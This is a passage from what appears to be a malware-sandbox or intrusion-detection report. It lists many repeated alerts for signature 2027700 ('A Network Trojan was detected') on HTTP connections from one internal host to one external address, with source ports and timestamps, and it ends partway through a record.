                              Timestamp:192.168.2.762.204.41.449967802027700 02/07/23-23:08:14.132869
                              SID:2027700
                              Source Port:49967
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450172802027700 02/07/23-23:09:11.243219
                              SID:2027700
                              Source Port:50172
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449844802027700 02/07/23-23:07:41.013550
                              SID:2027700
                              Source Port:49844
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449939802027700 02/07/23-23:08:07.214342
                              SID:2027700
                              Source Port:49939
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450066802027700 02/07/23-23:08:42.558660
                              SID:2027700
                              Source Port:50066
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450267802027700 02/07/23-23:09:36.717040
                              SID:2027700
                              Source Port:50267
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450463802027700 02/07/23-23:10:26.545692
                              SID:2027700
                              Source Port:50463
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449816802027700 02/07/23-23:07:32.564007
                              SID:2027700
                              Source Port:49816
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450144802027700 02/07/23-23:09:02.280526
                              SID:2027700
                              Source Port:50144
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450239802027700 02/07/23-23:09:29.333776
                              SID:2027700
                              Source Port:50239
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449934802027700 02/07/23-23:08:05.990363
                              SID:2027700
                              Source Port:49934
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450262802027700 02/07/23-23:09:35.513958
                              SID:2027700
                              Source Port:50262
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449738802027700 02/07/23-23:07:12.270875
                              SID:2027700
                              Source Port:49738
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450357802027700 02/07/23-23:09:58.872294
                              SID:2027700
                              Source Port:50357
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450340802027700 02/07/23-23:09:54.719055
                              SID:2027700
                              Source Port:50340
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449721802027700 02/07/23-23:07:08.117512
                              SID:2027700
                              Source Port:49721
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449990802027700 02/07/23-23:08:22.153608
                              SID:2027700
                              Source Port:49990
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450352802027700 02/07/23-23:09:57.641139
                              SID:2027700
                              Source Port:50352
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449733802027700 02/07/23-23:07:11.073843
                              SID:2027700
                              Source Port:49733
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450000802027700 02/07/23-23:08:24.592012
                              SID:2027700
                              Source Port:50000
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450407802027700 02/07/23-23:10:11.016581
                              SID:2027700
                              Source Port:50407
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450082802027700 02/07/23-23:08:46.560439
                              SID:2027700
                              Source Port:50082
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449782802027700 02/07/23-23:07:24.432492
                              SID:2027700
                              Source Port:49782
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450435802027700 02/07/23-23:10:19.733664
                              SID:2027700
                              Source Port:50435
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449754802027700 02/07/23-23:07:15.855344
                              SID:2027700
                              Source Port:49754
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449705802027700 02/07/23-23:07:04.226733
                              SID:2027700
                              Source Port:49705
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450324802027700 02/07/23-23:09:50.786571
                              SID:2027700
                              Source Port:50324
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450290802027700 02/07/23-23:09:42.372267
                              SID:2027700
                              Source Port:50290
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450373802027700 02/07/23-23:10:02.763122
                              SID:2027700
                              Source Port:50373
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450116802027700 02/07/23-23:08:55.305221
                              SID:2027700
                              Source Port:50116
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449962802027700 02/07/23-23:08:12.926371
                              SID:2027700
                              Source Port:49962
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450033802027700 02/07/23-23:08:32.657521
                              SID:2027700
                              Source Port:50033
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450189802027700 02/07/23-23:09:15.358033
                              SID:2027700
                              Source Port:50189
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449787802027700 02/07/23-23:07:25.659773
                              SID:2027700
                              Source Port:49787
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450218802027700 02/07/23-23:09:22.479535
                              SID:2027700
                              Source Port:50218
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450402802027700 02/07/23-23:10:09.761332
                              SID:2027700
                              Source Port:50402
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449995802027700 02/07/23-23:08:23.383016
                              SID:2027700
                              Source Port:49995
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450111802027700 02/07/23-23:08:54.086078
                              SID:2027700
                              Source Port:50111
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449700802027700 02/07/23-23:07:03.031561
                              SID:2027700
                              Source Port:49700
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449759802027700 02/07/23-23:07:17.049971
                              SID:2027700
                              Source Port:49759
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449889802027700 02/07/23-23:07:52.061130
                              SID:2027700
                              Source Port:49889
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450005802027700 02/07/23-23:08:25.803187
                              SID:2027700
                              Source Port:50005
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450087802027700 02/07/23-23:08:47.809633
                              SID:2027700
                              Source Port:50087
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450378802027700 02/07/23-23:10:03.940156
                              SID:2027700
                              Source Port:50378
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450026802027700 02/07/23-23:08:30.966267
                              SID:2027700
                              Source Port:50026
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449988802027700 02/07/23-23:08:21.653564
                              SID:2027700
                              Source Port:49988
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450255802027700 02/07/23-23:09:33.778377
                              SID:2027700
                              Source Port:50255
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449823802027700 02/07/23-23:07:34.268183
                              SID:2027700
                              Source Port:49823
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449979802027700 02/07/23-23:08:19.443584
                              SID:2027700
                              Source Port:49979
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450451802027700 02/07/23-23:10:23.598729
                              SID:2027700
                              Source Port:50451
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449832802027700 02/07/23-23:07:36.602000
                              SID:2027700
                              Source Port:49832
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450246802027700 02/07/23-23:09:31.574488
                              SID:2027700
                              Source Port:50246
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450442802027700 02/07/23-23:10:21.434131
                              SID:2027700
                              Source Port:50442
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450054802027700 02/07/23-23:08:39.617227
                              SID:2027700
                              Source Port:50054
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450184802027700 02/07/23-23:09:14.118143
                              SID:2027700
                              Source Port:50184
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450397802027700 02/07/23-23:10:08.575838
                              SID:2027700
                              Source Port:50397
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449893802027700 02/07/23-23:07:53.025577
                              SID:2027700
                              Source Port:49893
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449922802027700 02/07/23-23:08:03.022275
                              SID:2027700
                              Source Port:49922
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450369802027700 02/07/23-23:10:01.812383
                              SID:2027700
                              Source Port:50369
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450470802027700 02/07/23-23:10:28.297773
                              SID:2027700
                              Source Port:50470
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449851802027700 02/07/23-23:07:42.712679
                              SID:2027700
                              Source Port:49851
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449804802027700 02/07/23-23:07:29.696240
                              SID:2027700
                              Source Port:49804
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450227802027700 02/07/23-23:09:24.691350
                              SID:2027700
                              Source Port:50227
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450423802027700 02/07/23-23:10:14.904732
                              SID:2027700
                              Source Port:50423
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450061802027700 02/07/23-23:08:41.341687
                              SID:2027700
                              Source Port:50061
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450274802027700 02/07/23-23:09:38.463286
                              SID:2027700
                              Source Port:50274
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450070802027700 02/07/23-23:08:43.541726
                              SID:2027700
                              Source Port:50070
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449794802027700 02/07/23-23:07:27.299792
                              SID:2027700
                              Source Port:49794
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450073802027700 02/07/23-23:08:44.306614
                              SID:2027700
                              Source Port:50073
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450156802027700 02/07/23-23:09:05.211996
                              SID:2027700
                              Source Port:50156
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449950802027700 02/07/23-23:08:09.942679
                              SID:2027700
                              Source Port:49950
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449766802027700 02/07/23-23:07:19.651200
                              SID:2027700
                              Source Port:49766
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450128802027700 02/07/23-23:08:58.335870
                              SID:2027700
                              Source Port:50128
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449775802027700 02/07/23-23:07:22.751531
                              SID:2027700
                              Source Port:49775
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450468802027700 02/07/23-23:10:27.766831
                              SID:2027700
                              Source Port:50468
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449849802027700 02/07/23-23:07:42.221380
                              SID:2027700
                              Source Port:49849
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450042802027700 02/07/23-23:08:36.263611
                              SID:2027700
                              Source Port:50042
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450394802027700 02/07/23-23:10:07.826263
                              SID:2027700
                              Source Port:50394
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450312802027700 02/07/23-23:09:47.795938
                              SID:2027700
                              Source Port:50312
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450385802027700 02/07/23-23:10:05.658909
                              SID:2027700
                              Source Port:50385
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450303802027700 02/07/23-23:09:45.572466
                              SID:2027700
                              Source Port:50303
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450045802027700 02/07/23-23:08:37.461652
                              SID:2027700
                              Source Port:50045
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450017802027700 02/07/23-23:08:28.743485
                              SID:2027700
                              Source Port:50017
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450366802027700 02/07/23-23:10:01.065650
                              SID:2027700
                              Source Port:50366
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449747802027700 02/07/23-23:07:14.171173
                              SID:2027700
                              Source Port:49747
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449877802027700 02/07/23-23:07:49.111852
                              SID:2027700
                              Source Port:49877
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449712802027700 02/07/23-23:07:05.940453
                              SID:2027700
                              Source Port:49712
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450283802027700 02/07/23-23:09:40.653335
                              SID:2027700
                              Source Port:50283
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450414802027700 02/07/23-23:10:12.687095
                              SID:2027700
                              Source Port:50414
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450201802027700 02/07/23-23:09:18.336544
                              SID:2027700
                              Source Port:50201
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450331802027700 02/07/23-23:09:52.497858
                              SID:2027700
                              Source Port:50331
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449896802027700 02/07/23-23:07:53.775433
                              SID:2027700
                              Source Port:49896
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449915802027700 02/07/23-23:08:01.310915
                              SID:2027700
                              Source Port:49915
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450163802027700 02/07/23-23:09:06.937703
                              SID:2027700
                              Source Port:50163
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449714802027700 02/07/23-23:07:06.440544
                              SID:2027700
                              Source Port:49714
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449910802027700 02/07/23-23:08:00.070255
                              SID:2027700
                              Source Port:49910
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449809802027700 02/07/23-23:07:30.882146
                              SID:2027700
                              Source Port:49809
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450196802027700 02/07/23-23:09:17.107942
                              SID:2027700
                              Source Port:50196
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450109802027700 02/07/23-23:08:53.586754
                              SID:2027700
                              Source Port:50109
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449773802027700 02/07/23-23:07:22.191273
                              SID:2027700
                              Source Port:49773
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450137802027700 02/07/23-23:09:00.524989
                              SID:2027700
                              Source Port:50137
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450333802027700 02/07/23-23:09:52.974040
                              SID:2027700
                              Source Port:50333
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450305802027700 02/07/23-23:09:46.051156
                              SID:2027700
                              Source Port:50305
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450392802027700 02/07/23-23:10:07.350927
                              SID:2027700
                              Source Port:50392
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450210802027700 02/07/23-23:09:20.545993
                              SID:2027700
                              Source Port:50210
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449868802027700 02/07/23-23:07:46.881014
                              SID:2027700
                              Source Port:49868
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450428802027700 02/07/23-23:10:16.360693
                              SID:2027700
                              Source Port:50428
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450191802027700 02/07/23-23:09:15.842999
                              SID:2027700
                              Source Port:50191
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449837802027700 02/07/23-23:07:38.971375
                              SID:2027700
                              Source Port:49837
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450168802027700 02/07/23-23:09:09.197666
                              SID:2027700
                              Source Port:50168
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450165802027700 02/07/23-23:09:07.791157
                              SID:2027700
                              Source Port:50165
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450456802027700 02/07/23-23:10:24.827371
                              SID:2027700
                              Source Port:50456
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450300802027700 02/07/23-23:09:44.841607
                              SID:2027700
                              Source Port:50300
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449898802027700 02/07/23-23:07:54.273097
                              SID:2027700
                              Source Port:49898
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449981802027700 02/07/23-23:08:19.921142
                              SID:2027700
                              Source Port:49981
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449941802027700 02/07/23-23:08:07.714681
                              SID:2027700
                              Source Port:49941
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450030802027700 02/07/23-23:08:31.914466
                              SID:2027700
                              Source Port:50030
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450382802027700 02/07/23-23:10:04.927710
                              SID:2027700
                              Source Port:50382
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449763802027700 02/07/23-23:07:18.271872
                              SID:2027700
                              Source Port:49763
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450315802027700 02/07/23-23:09:48.543330
                              SID:2027700
                              Source Port:50315
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449778802027700 02/07/23-23:07:23.476930
                              SID:2027700
                              Source Port:49778
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449971802027700 02/07/23-23:08:15.502675
                              SID:2027700
                              Source Port:49971
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450107802027700 02/07/23-23:08:53.058285
                              SID:2027700
                              Source Port:50107
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450459802027700 02/07/23-23:10:25.566570
                              SID:2027700
                              Source Port:50459
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450371802027700 02/07/23-23:10:02.294848
                              SID:2027700
                              Source Port:50371
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449752802027700 02/07/23-23:07:15.374110
                              SID:2027700
                              Source Port:49752
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450241802027700 02/07/23-23:09:30.345222
                              SID:2027700
                              Source Port:50241
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449865802027700 02/07/23-23:07:46.144261
                              SID:2027700
                              Source Port:49865
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450193802027700 02/07/23-23:09:16.370708
                              SID:2027700
                              Source Port:50193
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449735802027700 02/07/23-23:07:11.564677
                              SID:2027700
                              Source Port:49735
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449913802027700 02/07/23-23:08:00.811571
                              SID:2027700
                              Source Port:49913
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450063802027700 02/07/23-23:08:41.843313
                              SID:2027700
                              Source Port:50063
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450213802027700 02/07/23-23:09:21.269831
                              SID:2027700
                              Source Port:50213
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450343802027700 02/07/23-23:09:55.462030
                              SID:2027700
                              Source Port:50343
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450354802027700 02/07/23-23:09:58.136933
                              SID:2027700
                              Source Port:50354
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449724802027700 02/07/23-23:07:08.827019
                              SID:2027700
                              Source Port:49724
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449943802027700 02/07/23-23:08:08.214342
                              SID:2027700
                              Source Port:49943
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450135802027700 02/07/23-23:09:00.033380
                              SID:2027700
                              Source Port:50135
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449964802027700 02/07/23-23:08:13.400472
                              SID:2027700
                              Source Port:49964
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450298802027700 02/07/23-23:09:44.339809
                              SID:2027700
                              Source Port:50298
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450326802027700 02/07/23-23:09:51.276591
                              SID:2027700
                              Source Port:50326
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449707802027700 02/07/23-23:07:04.724651
                              SID:2027700
                              Source Port:49707
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449768802027700 02/07/23-23:07:20.940206
                              SID:2027700
                              Source Port:49768
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449875802027700 02/07/23-23:07:48.616862
                              SID:2027700
                              Source Port:49875
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450142802027700 02/07/23-23:09:01.792842
                              SID:2027700
                              Source Port:50142
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450231802027700 02/07/23-23:09:25.697760
                              SID:2027700
                              Source Port:50231
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450387802027700 02/07/23-23:10:06.125158
                              SID:2027700
                              Source Port:50387
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449697802027700 02/07/23-23:07:01.357866
                              SID:2027700
                              Source Port:49697
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450308802027700 02/07/23-23:09:46.817930
                              SID:2027700
                              Source Port:50308
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450160802027700 02/07/23-23:09:06.194716
                              SID:2027700
                              Source Port:50160
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449992802027700 02/07/23-23:08:22.643209
                              SID:2027700
                              Source Port:49992
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449918802027700 02/07/23-23:08:02.062414
                              SID:2027700
